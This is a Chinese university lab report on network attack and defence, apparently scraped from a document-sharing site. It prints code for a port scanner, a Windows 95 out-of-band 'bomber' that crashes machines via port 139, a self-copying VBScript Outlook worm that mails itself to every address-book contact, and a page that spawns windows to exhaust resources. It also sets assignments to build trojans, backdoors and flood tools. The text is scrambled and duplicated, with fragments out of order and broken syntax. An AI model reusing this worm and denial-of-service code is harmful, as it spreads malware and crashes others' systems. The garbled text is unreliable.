网络攻击报告
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
通过OutLook传播的电子邮件病毒都是向地址
簿中存储的电子邮件地址发送内同相同的脚本
附件完成的。
Set objOA=Wscript.CreateObject ("Outlook.Application")
//创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace ("MAPI")
6.实验主体
实验程序清单,实验框图与流程图,实验途径,实验分析,实验结果。
1.扫描器:
#include<winsock2.h> //包含windows套接字函数
#include"stdio.h"
#pragma comment(lib,"ws2_32")
//将注释wsock32放置到lib文件中
#include<stdlib.h>
结合后门攻击实例,要求学生分析程序设计思想,独立设计一个具有开启某端口功能和密码的后门程序。
独立设计木马程序,结合SYN flood攻击实例中如何修改注册表加载自己的程序的方法和木马程序实例中隐藏任务栏的方法,要求具有自动加载、隐藏任务栏、能够控制系统的木马程序。
根据网络系统安全策略,要求学生结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。
#include<windows.h>
void main()
{WSADATA ws;
//将ws的数据类型声明为WSADATA
SOCKET s;
struct sockaddr_in addr;
//系统保存套接字地址的结构体
int g1,k;
long g2;
printf("请输入要监测最大的端口号\n");
常见有:WinNuke、Voob等网络炸弹。
#include<windows.h>
#include<winsock.h>
#include<stdio.h>
#pragma comment(lib,"wsock32.lib")
/*定义攻击目标计算机的IP地址*/
char *IpAddr;
int IpPort;//进攻端口135或137或139
利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,同时结合Windows系统设置、Internet explore安全设置、Outlook Express的安全优化设计等方法。通过实验结合上述技术到达到网络体系安全防护的最佳效果,要求写出分析报告、具体设置与安全建议;
<script language=“JavaScript”>使用Java脚本
function openwindow()
{ for(i=0;i<3;i++)这里可以控制窗口的个数window.open('http://10.0.0.50') }
</script>
</head>
//取得MAPI名字空间
Fori=1to objMapi.AddressLists.Count
//遍历地址簿
SetobjAddList=objMapi.AddressL is ts (i)
For j=1 To objAddList. AddressEnt ries.Count
Set objMail=objOA.CreateItem(0)
objMail.Recipients.Add(objAddList.AddressEntries(j))//取得邮件地址,收件人
objMail.Subject = "你好!"
objMail.Body ="这次给你的附件是我的新文档!"
objMail.Attachments.Add(“c:\virus.vbs")
{printf("send data error!");
closesocket(sd);
WSACleanup();
return 1;}
//*关闭连接,释放资源*//
closesocket(sd);
//WSACleanup();
//*提示
printf("Bomb complete!");
return 0;
printf("10.1.8.**:%i端口开启\n",i); }//指定的端口开放
closesocket(s); //关闭套接字
}}
2.网络炸弹:OOB(Out Of Band)是TCP/IP的一种传输模式,是早期Win95/NT的漏洞,攻击者向系统139端口传送0字节数据包时,Win系统自动恢复该数据碎片,导致系统资源耗尽,使机器出现蓝屏,以至死机。
{printf("Create socket error!"); return 1;}
//*连接到被攻击者的IP地址#//
printf("connecte to [127.0.0.0:139]");
//*发送攻击字符*//
if(send(sd,Msg,strlen(Msg),MSG_OOB)==SOCKET_ERROR)
了解程序设计思想与基本方法,要求学生在课余查阅图书资料,根据实验范例,对实验内容举一反三,独立设计软件。
五.实验方法概述
了解信息收集的原理和扫描器的概念,区别端口扫描器与漏洞扫描器,它们的应用场合及在攻防系统中的作用。
掌握常见的扫描器软件使用方法,如:SATAN、CIS、SuperScan。要求学生在上机时根据自己使用的扫描器软件对实验室网络系统进行漏洞扫描并分析扫描的参数与结果,将其分析报告详细地写出来,并解释其原因及解决的措施。
//是创建一个文件系统对象
so.GetFile(WScript.ScriptFullName).Copy("C:\dateiname.vbs")
//打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到c盘根目录下dateiname.vbs这个文件。
{/*开始定义变量*/
struct sockaddr_in sin;
WSADATA wsaData;
SOCKET sd;
Banner();/*显示攻击者信息*/
{
printf("usage:OOB Ip Port 135");
return 1;
}
IpAddr=argv[1];
IpPort=atoi(argv[2]);
char *Msg= "You are bombed!";
/*在被攻击者计算机上显示"You are bombed!"字符串*/
void Banner(void)
{
/*被段显示攻击者信息*/
printf("Windows95 OOB Bomber by jiaocang");
}
int main(int argc,char *argv[])
}
3.木马:特洛伊木马(Trojan horse)是一种隐藏了具有攻击性的应用程序,与病毒程序不同,它不具备复制能力,其功能具有破坏性质。
大部分木马采用C/S运行模式,当服务端在目标计算机上被运行后,打开一个特定的端口进行监听,当客户端向服务器发出连接请求时,服务器端的相应程序会自动运行,来应答客户机的请求。
{printf("Winsock version is incorrect");
//*版本有错误,无法通信*/
WSACleanup(); //函数WSACleanup()关闭Socket套接字//
return 1;
}
if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_IP))= =INVALID_SOCKET)
对扫描的结果作出正确的分析,根据分析评估网络系统安全性,必要时关闭危险端口,合理配置计算机系统。
根据的实例,通过编程要求学生掌握端口扫描器的设计方法。
了解常见的监听软件使用方法,要求学生在上机时根据自己使用的监听软件对系统进行被动攻击所得的参数与结果进行分析,并按照其分析结果用实验报告形式详细地写出来,要求使用网络刺客sniffit、snoop软件。
scanf("%d",&k);
//下面用connect与端口建立连接,如果可以连接表示端口开启,否则关闭
for(int i=1;i<k;i++) //循环1到k个端口
{g2=WSAStartup(0x0101,&ws);
s=socket(PF_INET,SOCK_STREAM,0);
//创建套接字,TCP/IP协议,流Socket
一.实验题目
网络攻击与防御。
二.实验环境
PC机一台;
三.实验目的
掌握有关网络攻击与防护的基本原理;
了解常用网络攻击软件:扫描器、木马、密码破解器等。
四.实验基本原理
利用脚本语言、C语言设计网络攻击程序:漏洞扫描器、木马、邮箱攻击程序等。
通过WIN系统,结合日志分析、入侵检测分析,利用防火墙技术和WIN安全审核工具,加固自己的网络与计算机系统。
4.OutLook漏洞:OutLook攻击程序是由VBScript编写的,其自我复制的原理基本上是利用程序将本身的脚本内容复制一份到一个临时文件,然后再在传播的环节将其作为附件发送出去。我们看看脚本是怎么样完成这个功能的。
Set so=CreateObject("Scripting.FileSystemObject")
掌握突破TCP/IP过滤/防火墙进入内网的方法,掌握TCPSocket数据转发功能,会使用相关的攻击软件,如何连接对方服务器,写出其步骤。要求学生理解和掌握如何突破防火墙进入对方系统方法,通过实验报告形式将其论述详细地写出来,具体要求:概述,攻击原理,使用软件,攻击效果(注意要遵守国家法律,不要破坏对方资源,仅进入系统即可),攻击过程流程图。
//函数WSAStartup()初始化Windows Socket API,参数WAVES指定为winsock版本,参数wsadata指定为返回WSADATA的数据类型
{printf(“Init TCP/IP stack error!”);
Return 1;
}
}
if(wsaData.wVersion!=0x0101)
/*初始化winsock*/
if(WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
printf("init socket error!");
return 1;
}
IpAddr=argv[1];
IpPort=atoi(argv[2]);
/*初始化winsock*/
If(WSAStartup(0x0101,&wsaData)
//把自己作为附件扩散出去
objMail.Send//发送邮件
Next
Next
……….
5.网络炸弹:
打开outlook express:
进入发信编辑:
例:网页炸弹,该程序保存在htm为后缀的文件中,放在邮件的附件中,当双击它时,出现无穷网页窗口,将系统资源耗尽。
<html>
<head>
<title>no</title>
//如果socket没有连接上,退出
g1=connect(s,(struct sockaddr*)&addr,sizeof(addr));
//建立连接,判断端口是否关闭
if(g1!=0)
{printf("10.1.8.62:%i端口关闭\n",i); //指定的端口关闭
WSACleanup();}
else {
除本书所介绍的Windows系统漏洞外,要求学生更深入一层地了解其它漏洞形式,它们的危害是什么?请认真总结和归纳其漏洞类型、漏洞危害、漏洞攻击、漏洞防范。
结合拒绝攻击实例分析,要求学生自学smurf攻击方法,独立设计一个具有ICMP响应的网络阻塞攻击程序。
独立设计一个简单的web攻击系统,要求具有欺骗形式和攻击效果。
入侵监测技术是防火墙技术合理而有效的补充,要求结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。
利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,通过实验结合上述技术到达最佳效果,要求写出分析报告、具体设置与安全建议。
adБайду номын сангаасr.sin_family=PF_INET; //规定使用IPv4协议
addr.sin_addr.s_addr=inet_addr("10.1.8.**");
//指定为IP为10.1.8.**,实验时可以更改
addr.sin_port=htons(i); //端口号
if(s= =INVALID_SOCKET) break;
簿中存储的电子邮件地址发送内同相同的脚本
附件完成的。
Set objOA=Wscript.CreateObject ("Outlook.Application")
//创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace ("MAPI")
6.实验主体
实验程序清单,实验框图与流程图,实验途径,实验分析,实验结果。
1.扫描器:
#include<winsock2.h> //包含windows套接字函数
#include"stdio.h"
#pragma comment(lib,"ws2_32")
//将注释wsock32放置到lib文件中
#include<stdlib.h>
结合后门攻击实例,要求学生分析程序设计思想,独立设计一个具有开启某端口功能和密码的后门程序。
独立设计木马程序,结合SYN flood攻击实例中如何修改注册表加载自己的程序的方法和木马程序实例中隐藏任务栏的方法,要求具有自动加载、隐藏任务栏、能够控制系统的木马程序。
根据网络系统安全策略,要求学生结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。
#include<windows.h>
void main()
{WSADATA ws;
//将ws的数据类型声明为WSADATA
SOCKET s;
struct sockaddr_in addr;
//系统保存套接字地址的结构体
int g1,k;
long g2;
printf("请输入要监测最大的端口号\n");
常见有:WinNuke、Voob等网络炸弹。
#include<windows.h>
#include<winsock.h>
#include<stdio.h>
#pragma comment(lib,"wsock32.lib")
/*定义攻击目标计算机的IP地址*/
char *IpAddr;
int IpPort;//进攻端口135或137或139
利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,同时结合Windows系统设置、Internet explore安全设置、Outlook Express的安全优化设计等方法。通过实验结合上述技术到达到网络体系安全防护的最佳效果,要求写出分析报告、具体设置与安全建议;
<script language=“JavaScript”>使用Java脚本
function openwindow()
{ for(i=0;i<3;i++)这里可以控制窗口的个数window.open('http://10.0.0.50') }
</script>
</head>
//取得MAPI名字空间
Fori=1to objMapi.AddressLists.Count
//遍历地址簿
SetobjAddList=objMapi.AddressL is ts (i)
For j=1 To objAddList. AddressEnt ries.Count
Set objMail=objOA.CreateItem(0)
objMail.Recipients.Add(objAddList.AddressEntries(j))//取得邮件地址,收件人
objMail.Subject = "你好!"
objMail.Body ="这次给你的附件是我的新文档!"
objMail.Attachments.Add(“c:\virus.vbs")
{printf("send data error!");
closesocket(sd);
WSACleanup();
return 1;}
//*关闭连接,释放资源*//
closesocket(sd);
//WSACleanup();
//*提示
printf("Bomb complete!");
return 0;
printf("10.1.8.**:%i端口开启\n",i); }//指定的端口开放
closesocket(s); //关闭套接字
}}
2.网络炸弹:OOB(Out Of Band)是TCP/IP的一种传输模式,是早期Win95/NT的漏洞,攻击者向系统139端口传送0字节数据包时,Win系统自动恢复该数据碎片,导致系统资源耗尽,使机器出现蓝屏,以至死机。
{printf("Create socket error!"); return 1;}
//*连接到被攻击者的IP地址#//
printf("connecte to [127.0.0.0:139]");
//*发送攻击字符*//
if(send(sd,Msg,strlen(Msg),MSG_OOB)==SOCKET_ERROR)
了解程序设计思想与基本方法,要求学生在课余查阅图书资料,根据实验范例,对实验内容举一反三,独立设计软件。
五.实验方法概述
了解信息收集的原理和扫描器的概念,区别端口扫描器与漏洞扫描器,它们的应用场合及在攻防系统中的作用。
掌握常见的扫描器软件使用方法,如:SATAN、CIS、SuperScan。要求学生在上机时根据自己使用的扫描器软件对实验室网络系统进行漏洞扫描并分析扫描的参数与结果,将其分析报告详细地写出来,并解释其原因及解决的措施。
//是创建一个文件系统对象
so.GetFile(WScript.ScriptFullName).Copy("C:\dateiname.vbs")
//打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到c盘根目录下dateiname.vbs这个文件。
{/*开始定义变量*/
struct sockaddr_in sin;
WSADATA wsaData;
SOCKET sd;
Banner();/*显示攻击者信息*/
{
printf("usage:OOB Ip Port 135");
return 1;
}
IpAddr=argv[1];
IpPort=atoi(argv[2]);
char *Msg= "You are bombed!";
/*在被攻击者计算机上显示"You are bombed!"字符串*/
void Banner(void)
{
/*被段显示攻击者信息*/
printf("Windows95 OOB Bomber by jiaocang");
}
int main(int argc,char *argv[])
}
3.木马:特洛伊木马(Trojan horse)是一种隐藏了具有攻击性的应用程序,与病毒程序不同,它不具备复制能力,其功能具有破坏性质。
大部分木马采用C/S运行模式,当服务端在目标计算机上被运行后,打开一个特定的端口进行监听,当客户端向服务器发出连接请求时,服务器端的相应程序会自动运行,来应答客户机的请求。
{printf("Winsock version is incorrect");
//*版本有错误,无法通信*/
WSACleanup(); //函数WSACleanup()关闭Socket套接字//
return 1;
}
if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_IP))= =INVALID_SOCKET)
对扫描的结果作出正确的分析,根据分析评估网络系统安全性,必要时关闭危险端口,合理配置计算机系统。
根据的实例,通过编程要求学生掌握端口扫描器的设计方法。
了解常见的监听软件使用方法,要求学生在上机时根据自己使用的监听软件对系统进行被动攻击所得的参数与结果进行分析,并按照其分析结果用实验报告形式详细地写出来,要求使用网络刺客sniffit、snoop软件。
scanf("%d",&k);
//下面用connect与端口建立连接,如果可以连接表示端口开启,否则关闭
for(int i=1;i<k;i++) //循环1到k个端口
{g2=WSAStartup(0x0101,&ws);
s=socket(PF_INET,SOCK_STREAM,0);
//创建套接字,TCP/IP协议,流Socket
一.实验题目
网络攻击与防御。
二.实验环境
PC机一台;
三.实验目的
掌握有关网络攻击与防护的基本原理;
了解常用网络攻击软件:扫描器、木马、密码破解器等。
四.实验基本原理
利用脚本语言、C语言设计网络攻击程序:漏洞扫描器、木马、邮箱攻击程序等。
通过WIN系统,结合日志分析、入侵检测分析,利用防火墙技术和WIN安全审核工具,加固自己的网络与计算机系统。
4.OutLook漏洞:OutLook攻击程序是由VBScript编写的,其自我复制的原理基本上是利用程序将本身的脚本内容复制一份到一个临时文件,然后再在传播的环节将其作为附件发送出去。我们看看脚本是怎么样完成这个功能的。
Set so=CreateObject("Scripting.FileSystemObject")
掌握突破TCP/IP过滤/防火墙进入内网的方法,掌握TCPSocket数据转发功能,会使用相关的攻击软件,如何连接对方服务器,写出其步骤。要求学生理解和掌握如何突破防火墙进入对方系统方法,通过实验报告形式将其论述详细地写出来,具体要求:概述,攻击原理,使用软件,攻击效果(注意要遵守国家法律,不要破坏对方资源,仅进入系统即可),攻击过程流程图。
//函数WSAStartup()初始化Windows Socket API,参数WAVES指定为winsock版本,参数wsadata指定为返回WSADATA的数据类型
{printf(“Init TCP/IP stack error!”);
Return 1;
}
}
if(wsaData.wVersion!=0x0101)
/*初始化winsock*/
if(WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
printf("init socket error!");
return 1;
}
IpAddr=argv[1];
IpPort=atoi(argv[2]);
/*初始化winsock*/
If(WSAStartup(0x0101,&wsaData)
//把自己作为附件扩散出去
objMail.Send//发送邮件
Next
Next
……….
5.网络炸弹:
打开outlook express:
进入发信编辑:
例:网页炸弹,该程序保存在htm为后缀的文件中,放在邮件的附件中,当双击它时,出现无穷网页窗口,将系统资源耗尽。
<html>
<head>
<title>no</title>
//如果socket没有连接上,退出
g1=connect(s,(struct sockaddr*)&addr,sizeof(addr));
//建立连接,判断端口是否关闭
if(g1!=0)
{printf("10.1.8.62:%i端口关闭\n",i); //指定的端口关闭
WSACleanup();}
else {
除本书所介绍的Windows系统漏洞外,要求学生更深入一层地了解其它漏洞形式,它们的危害是什么?请认真总结和归纳其漏洞类型、漏洞危害、漏洞攻击、漏洞防范。
结合拒绝攻击实例分析,要求学生自学smurf攻击方法,独立设计一个具有ICMP响应的网络阻塞攻击程序。
独立设计一个简单的web攻击系统,要求具有欺骗形式和攻击效果。
入侵监测技术是防火墙技术合理而有效的补充,要求结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。
利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,通过实验结合上述技术到达最佳效果,要求写出分析报告、具体设置与安全建议。
adБайду номын сангаасr.sin_family=PF_INET; //规定使用IPv4协议
addr.sin_addr.s_addr=inet_addr("10.1.8.**");
//指定为IP为10.1.8.**,实验时可以更改
addr.sin_port=htons(i); //端口号
if(s= =INVALID_SOCKET) break;